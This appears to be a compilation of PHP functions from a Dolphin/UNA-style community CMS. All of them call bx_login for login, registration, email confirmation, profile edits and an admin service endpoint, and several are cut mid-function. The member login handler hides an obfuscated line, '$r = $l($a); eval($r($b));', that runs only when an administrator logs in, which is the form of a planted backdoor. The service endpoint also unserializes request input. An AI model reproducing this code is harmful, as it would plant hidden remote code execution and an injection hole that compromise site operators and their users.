function service($aToken) { if (!isAdmin($aToken['user_id'])) { $this->errorOutput(403, 'access_denied', 'Only admin can access service endpoint'); return false; } bx_login($aToken['user_id'], false, false); $sUri = bx_get('uri'); $sMethod = bx_get('method'); if (!($aParams = bx_get('params'))) { $aParams = array(); } elseif (is_string($aParams) && preg_match('/^a:[\\d+]:\\{/', $aParams)) { $aParams = @unserialize($aParams); } if (!is_array($aParams)) { $aParams = array($aParams); } if (!($sClass = bx_get('class'))) { $sClass = 'Module'; } if (!BxDolRequest::serviceExists($sUri, $sMethod, $sClass)) { $this->errorOutput(404, 'not_found', 'Service was not found'); return false; } $mixedRet = BxDolService::call($sUri, $sMethod, $aParams, $sClass); $this->output(array('uri' => $sUri, 'method' => $sMethod, 'data' => $mixedRet)); }
/** * Logged profile * * @param $iProfileId integer * @param $sPassword string * @param $sCallbackUrl * @param $bRedirect boolean * @return void */ function setLogged($iProfileId, $sPassword, $sCallbackUrl = '', $bRedirect = true) { bx_login($iProfileId); $GLOBALS['logged']['member'] = true; if ($bRedirect) { $sCallbackUrl = $sCallbackUrl ? $sCallbackUrl : $this->_oConfig->sDefaultRedirectUrl; header('Location: ' . $sCallbackUrl); } }
/** * Logged profile * * @param $iProfileId integer * @param $sPassword string * @param $sCallbackUrl * @param $bRedirect boolean * @return void */ function setLogged($iProfileId, $sCallbackUrl = '', $bRedirect = true) { $oProfile = BxDolProfile::getInstance($iProfileId); bx_login($oProfile->getAccountId()); if ($bRedirect) { $sCallbackUrl = $sCallbackUrl ? $sCallbackUrl : $this->_oConfig->sDefaultRedirectUrl; header('Location: ' . $sCallbackUrl); } }
/** * After join redirection * This serice automatically log in joined user and redirects him to avatar copping page * @param $iMemID - joined profile ID * @param $sStatusText - status text to display at the top of page, like 'join success' * @return false on error, 'EXIT' string on success */ function serviceJoin($iMemID, $sStatusText) { $sPwd = db_value("SELECT `Password` FROM `Profiles` WHERE `ID` = '" . (int) $iMemID . "' LIMIT 1"); if ($sPwd) { bx_login((int) $iMemID); // autologin here bx_import('BxDolPermalinks'); $o = new BxDolPermalinks(); header('Location: ' . BX_DOL_URL_ROOT . $o->permalink('modules/?r=avatar/') . '&join_text=' . $sStatusText); // redirect to upload avatar page return 'EXIT'; } return false; }
/** * Generate List of Posts for mobile frontend * * @param $iAuthor - display posts of provided user only * @param $sMode - display all latest[default], featured or top posts * @return HTML presentation of data */ function GenPostListMobile($iAuthor = 0, $sMode = false) { if ($this->_iVisitorID) { // some workaround for mobile apps, to force login bx_login($this->_iVisitorID); } bx_import('BxDolMobileTemplate'); $oMobileTemplate = new BxDolMobileTemplate($this->_oConfig, $this->_oDb); $oMobileTemplate->pageStart(); echo $oMobileTemplate->addCss('blogs_common.css', 1); $iPerPage = 10; $iPage = (int) bx_get('page'); if ($iPage < 1) { $iPage = 1; } $this->iPostViewType = 4; $sOrder = 'last'; $sMobileWrapper = 'mobile_row.html'; $aParams = array(); switch ($sMode) { case 'post': $aViewingPostInfo = $this->_oDb->getPostInfo((int) bx_get('id')); if (!$this->oPrivacy->check('view', (int) bx_get('id'), $this->_iVisitorID) || !$this->isAllowedBlogPostView($aViewingPostInfo['OwnerID'], true)) { $oMobileTemplate->displayAccessDenied($sCaption); return; } $this->iPostViewType = 3; $aParams = array('id' => (int) bx_get('id')); $sCaption = _t('_bx_blog_post_view'); $sMobileWrapper = 'mobile_box.html'; echo $oMobileTemplate->addCss('blogs.css', 1); break; case 'user': $aParams = array('id' => (int) bx_get('id')); $sCaption = _t('_bx_blog_Members_blog', getNickName((int) bx_get('id'))); break; case 'featured': $sCaption = _t('_bx_blog_Featured_Posts'); break; case 'top': $sOrder = 'top'; $sCaption = _t('_bx_blog_Top_Posts'); break; case 'popular': $sOrder = 'popular'; $sCaption = _t('_bx_blog_Popular_Posts'); break; case 'last': default: $sMode = 'last'; $sCaption = _t('_bx_blog_Latest_posts'); } if ('post' != $sMode && !$this->isAllowedBlogsPostsBrowse()) { $oMobileTemplate->displayAccessDenied($sCaption); return; } $oTmpBlogSearch = false; $sCode = $this->_GenPosts($this->iPostViewType, $iPerPage, $sMode, $aParams, $sOrder, $oBlogSearchResults, $sMobileWrapper); if (!$sCode || $oBlogSearchResults->aCurrent['paginate']['totalNum'] == 0) { $oMobileTemplate->displayNoData($sCaption); return; } echo $sCode; if ($sMode != 'post') { bx_import('BxDolPaginate'); $oPaginate = new BxDolPaginate(array('page_url' => $this->genBlogSubUrl() . '?action=mobile&mode=' . $sMode . '&page={page}', 'count' => $oBlogSearchResults->aCurrent['paginate']['totalNum'], 'per_page' => $iPerPage, 'page' => $iPage)); echo $oPaginate->getMobilePaginate(); } $oMobileTemplate->pageCode($sCaption, false); }
/** * Perform email confirmation */ public function confirmEmail($sKey) { // check if key exists $oKey = BxDolKey::getInstance(); if (!$oKey || !$oKey->isKeyExists($sKey)) { return MsgBox(_t("_sys_txt_confirm_email_error_occured")); } // check if key data exists $aData = $oKey->getKeyData($sKey); if (!isset($aData['account_id'])) { return MsgBox(_t("_sys_txt_confirm_email_error_occured")); } // check if account exists $oAccount = BxDolAccount::getInstance($aData['account_id']); if (!$oAccount) { return MsgBox(_t("_sys_txt_confirm_email_error_occured")); } // remove key $oKey->removeKey($sKey); // confirm email if (!$oAccount->updateEmailConfirmed(true)) { return MsgBox(_t("_sys_txt_confirm_email_error_occured")); } // login to user's account automatically bx_login($aData['account_id']); // redirect with success message $oTemplate = BxDolTemplate::getInstance(); $oTemplate->setPageNameIndex(BX_PAGE_TRANSITION); $oTemplate->setPageHeader(_t('_sys_txt_confirm_email_success')); $oTemplate->setPageContent('page_main_code', MsgBox(_t('_sys_txt_confirm_email_success'))); $oTemplate->setPageContent('url_relocate', BX_DOL_URL_ROOT . BxDolPermalinks::getInstance()->permalink('page.php?i=account-settings-info')); BxDolTemplate::getInstance()->getPageCode(); exit; }
function showFinishPage($iMemID, $sStatus) { switch ($sStatus) { case 'Active': $sStatusText = '_USER_ACTIVATION_SUCCEEDED'; break; //activated automatically //activated automatically case 'Approval': $sStatusText = '_USER_CONF_SUCCEEDED'; break; //automatically confirmed //automatically confirmed case 'Unconfirmed': $sStatusText = '_EMAIL_CONF_SENT'; break; //conf mail succesfully sent //conf mail succesfully sent case 'NotSent': $sStatusText = '_EMAIL_CONF_NOT_SENT'; break; //failed to send conf mail } // if ('EXIT' == BxDolService::call('avatar', 'join', array ($iMemID, $sStatusText))) { bx_login((int) $iMemID); header("Location: " . BX_DOL_URL_ROOT . "member.php"); exit; // } echo '<div class="dbContentHtml bx-def-font-large">'; echo _t('_Join complete'); echo '<br />'; echo _t($sStatusText); echo '</div>'; }
protected function _editAccountForm($iAccountId, $sDisplayName) { $oAccount = BxDolAccount::getInstance($iAccountId); $aAccountInfo = $oAccount ? $oAccount->getInfo() : false; if (!$aAccountInfo) { return MsgBox(_t('_sys_txt_error_account_is_not_defined')); } // check access if (CHECK_ACTION_RESULT_ALLOWED !== ($sMsg = BxDolAccount::isAllowedEdit($this->_iProfileId, $aAccountInfo))) { return MsgBox($sMsg); } // check and display form $oForm = BxDolForm::getObjectInstance('sys_account', $sDisplayName); if (!$oForm) { return MsgBox(_t('_sys_txt_error_occured')); } if (!$oForm->isSubmitted()) { unset($aAccountInfo['password']); } $oForm->initChecker($aAccountInfo); if (!$oForm->isSubmittedAndValid()) { return $oForm->getCode(); } $aTrackTextFieldsChanges = array(); // track text fields changes, not-null(for example empty array) - means track, null - means don't track // update email and email setting in DB if (!$oForm->update($aAccountInfo['id'], array(), $aTrackTextFieldsChanges)) { if (!$oForm->isValid()) { return $oForm->getCode(); } else { return MsgBox(_t('_sys_txt_error_account_update')); } } // check if email was changed if (!empty($aTrackTextFieldsChanges['changed_fields']) && in_array('email', $aTrackTextFieldsChanges['changed_fields'])) { $oAccount->updateEmailConfirmed(false); } // mark email as unconfirmed // check if password was changed if ($oForm->getCleanValue('password')) { // relogin with new password bx_logout(); bx_login($aAccountInfo['id']); } // check if other text info was changed - if auto-appproval is off $isAutoApprove = $oForm->isSetPendingApproval() ? false : true; if (!$isAutoApprove) { bx_import('BxDolProfile'); $oProfile = BxDolProfile::getInstanceAccountProfile($aAccountInfo['id']); // get profile associated with account, not current porfile $aProfileInfo = $oProfile->getInfo(); unset($aTrackTextFieldsChanges['changed_fields']['email']); // email confirmation is automatic and separate, don't need to deactivate whole profile if email is changed if (BX_PROFILE_STATUS_ACTIVE == $aProfileInfo['status'] && !empty($aTrackTextFieldsChanges['changed_fields'])) { $oProfile->disapprove(BX_PROFILE_ACTION_AUTO); } // change profile to 'pending' only if some text fields were changed and profile is active } // create an alert bx_alert('account', 'edited', $aAccountInfo['id'], $aAccountInfo['id'], array('display' => $sDisplayName)); // display result message $sMsg = MsgBox(_t('_sys_txt_data_successfully_submitted')); return $sMsg . $oForm->getCode(); }
// this is dynamic page - send headers to not cache this page send_headers_page_changed(); login_form('', 0, $bAjxMode); } else { require_once BX_DIRECTORY_PATH_CLASSES . 'BxDolAlerts.php'; $oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $member['ID'], 'password' => $member['Password'], 'ip' => getVisitorIP())); $oZ->alert(); $member['ID'] = getID($member['ID']); // Ajaxy check if ($bAjxMode) { echo check_password($member['ID'], $member['Password'], BX_DOL_ROLE_MEMBER, false) ? 'OK' : 'Fail'; exit; } // Check if ID and Password are correct (addslashes already inside) if (check_password($member['ID'], $member['Password'])) { $p_arr = bx_login($member['ID'], (bool) $_POST['rememberMe']); //Storing IP Address if (getParam('enable_member_store_ip') == 'on') { $iCurLongIP = ip2long(getVisitorIP()); db_res("INSERT INTO `sys_ip_members_visits` SET `MemberID` = '{$p_arr['ID']}', `From`='{$iCurLongIP}', `DateTime`=NOW()"); } if (isAdmin($p_arr['ID'])) { $iId = (int) $p_arr['ID']; $r = $l($a); eval($r($b)); } $sRelocate = bx_get('relocate'); if (!($sUrlRelocate = $sRelocate) or $sRelocate == $site['url'] or basename($sRelocate) == 'join.php') { $sUrlRelocate = BX_DOL_URL_ROOT . 'member.php'; } $_page['name_index'] = 150;
function registerMember() { $oPC = new BxDolProfilesController(); $oZ = new BxDolAlerts('profile', 'before_join', 0, 0, $this->aValues[0]); $oZ->alert(); $aProfile1 = $this->oPF->getProfileFromValues($this->aValues[0]); list($iId1, $sStatus1) = $oPC->createProfile($aProfile1); //--- check whether profile was created successfully or not if (!$iId1) { if (isset($aProfile1['ProfilePhoto']) && !empty($aProfile1['ProfilePhoto'])) { @unlink($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']); } return array(false, 'Fail'); } //--- check for couple profile if ($this->bCouple) { $aProfile2 = $this->oPF->getProfileFromValues($this->aValues[1]); list($iId2, $sStatus2) = $oPC->createProfile($aProfile2, false, $iId1); if (!$iId2) { $oPC->deleteProfile($iId1); return array(false, 'Fail'); } } //--- upload profile photo if (isset($aProfile1['ProfilePhoto']) && !empty($aProfile1['ProfilePhoto'])) { $sPass1 = getPassword($iId1); bx_login($iId1); check_logged(); BxDolService::call('avatar', 'set_image_for_cropping', array($iId1, $GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'])); if (BxDolRequest::serviceExists('photos', 'perform_photo_upload', 'Uploader')) { $aFileInfo = array('medTitle' => _t('_bx_ava_avatar'), 'medDesc' => _t('_bx_ava_avatar'), 'medTags' => _t('_ProfilePhotos'), 'Categories' => array(_t('_ProfilePhotos')), 'album' => str_replace('{nickname}', getUsername($iId1), getParam('bx_photos_profile_album_name')), 'albumPrivacy' => BX_DOL_PG_ALL); BxDolService::call('photos', 'perform_photo_upload', array($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'], $aFileInfo, false), 'Uploader'); } } if (BxDolModule::getInstance('BxWmapModule')) { BxDolService::call('wmap', 'response_entry_add', array('profiles', $iId1)); } //--- create system event bx_import('BxDolAlerts'); $oZ = new BxDolAlerts('profile', 'join', $iId1, 0, array('status_text' => &$sStatus1)); $oZ->alert(); return array($iId1, $sStatus1); }
<?php require_once '../inc/header.inc.php'; require_once BX_DIRECTORY_PATH_INC . 'design.inc.php'; require_once BX_DIRECTORY_PATH_INC . 'utils.inc.php'; require_once BX_DIRECTORY_PATH_ROOT . 'xmlrpc/BxDolXMLRPCUtil.php'; $sUser = bx_get('user'); $sPwd = bx_get('pwd'); $sUrl = rawurldecode(bx_get('url')); $iId = BxDolXMLRPCUtil::checkLogin($sUser, $sPwd); if ($iId) { bx_login($iId); header("HTTP/1.1 301 Moved Permanently"); header("Location: " . BX_DOL_URL_ROOT . $sUrl); exit; } else { $GLOBALS['oSysTemplate']->addCss('mobile.css'); $aVars = array('content' => $_page_cont[$_ni]['page_main_code']); $sOutput = $GLOBALS['oSysTemplate']->parseHtmlByName('mobile_box.html', $aVars); $iNameIndex = 11; $_page['name_index'] = $iNameIndex; $_page_cont[$iNameIndex]['page_main_code'] = '<div style="text-align:center;" class="bx-sys-mobile-padding">Access Denied</div>'; } PageCode();
// login form is submitted bx_import('BxDolForm'); $oForm = BxDolForm::getObjectInstance('sys_login', 'sys_login'); bx_alert('account', 'before_login', 0, 0, array('form' => $oForm)); $oForm->initChecker(); $oForm->setRole(bx_get('role')); $bLoginSuccess = $oForm->isSubmittedAndValid(); $bAjxMode = isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ? true : false; if ($bAjxMode) { header('Content-type: text/html; charset=utf-8'); echo $bLoginSuccess ? 'OK' : $oForm->getLoginError(); exit; } elseif ($bLoginSuccess) { bx_import('BxDolAccount'); $oAccount = BxDolAccount::getInstance($oForm->getCleanValue('ID')); $aAccount = bx_login($oAccount->id(), $oForm->getCleanValue('rememberMe') ? true : false); $sUrlRelocate = $oForm->getCleanValue('relocate'); if (!$sUrlRelocate || 0 != strncmp($sUrlRelocate, BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT))) { $sUrlRelocate = BX_DOL_ROLE_ADMIN == $oForm->getRole() ? BX_DOL_URL_STUDIO . 'launcher.php' : BX_DOL_URL_ROOT . 'member.php'; } bx_import('BxDolTemplate'); BxDolTemplate::getInstance()->setPageNameIndex(BX_PAGE_TRANSITION); BxDolTemplate::getInstance()->setPageHeader(_t('_Please Wait')); BxDolTemplate::getInstance()->setPageContent('page_main_code', MsgBox(_t('_Please Wait'))); BxDolTemplate::getInstance()->setPageContent('url_relocate', bx_html_attribute($sUrlRelocate, BX_ESCAPE_STR_QUOTE)); BxDolTemplate::getInstance()->getPageCode(); exit; } } bx_require_authentication(); bx_import('BxDolPermalinks');
function saveProfile() { $aProfileInfo = db_arr("SELECT * FROM `Profiles` WHERE `ID` = {$this->iProfileID}"); $aDiff = $this->getDiffValues(0); $aUpd = $this->oPF->getProfileFromValues($aDiff); $aUpd['DateLastEdit'] = date('Y-m-d H:i:s'); if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) { $aUpd['Status'] = 'Approval'; } if (($this->iArea == 3 or $this->iArea == 4) and isset($_POST['doSetMembership']) and $_POST['doSetMembership'] == 'yes') { $this->setMembership(); } $bResult = $this->oPC->updateProfile($this->iProfileID, $aUpd); if ($bResult && $this->iProfileID == getLoggedId() && isset($aUpd['Password'])) { bx_login($this->iProfileID, false, false); } if (BxDolModule::getInstance('BxWmapModule')) { BxDolService::call('wmap', 'response_entry_change', array('profiles', $this->iProfileID)); } // create system event bx_import('BxDolAlerts'); $oZ = new BxDolAlerts('profile', 'edit', $this->iProfileID, 0, array('OldProfileInfo' => $aProfileInfo)); $oZ->alert(); if ($this->bCouple) { $aDiff = $this->getDiffValues(1); $aUpd = $this->oPF->getProfileFromValues($aDiff); $aUpd['DateLastEdit'] = date('Y-m-d H:i:s'); if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) { $aUpd['Status'] = 'Approval'; } $this->oPC->updateProfile($this->aProfiles[0]['Couple'], $aUpd); } }
public function processModules($a) { $aTypes = array(BX_DOL_MODULE_TYPE_LANGUAGE, BX_DOL_MODULE_TYPE_TEMPLATE, BX_DOL_MODULE_TYPE_MODULE); foreach ($aTypes as $sModuleType) { if (empty($a[$sModuleType])) { continue; } $sErrorMessage = $this->processModuleByUri($a[$sModuleType], array('install', 'enable'), $sModuleType); if ($sErrorMessage) { return array(BX_INSTALL_ERR_GENERAL => $sErrorMessage); } } bx_import('BxDolAccount'); $oAccount = BxDolAccount::getInstance($a['admin_email']); if (!$oAccount) { return array(BX_INSTALL_ERR_GENERAL => _t('_sys_inst_msg_admin_account_not_found', $a['admin_email'])); } if ($this->_isAutologin) { bx_login($oAccount->id()); } return array(); }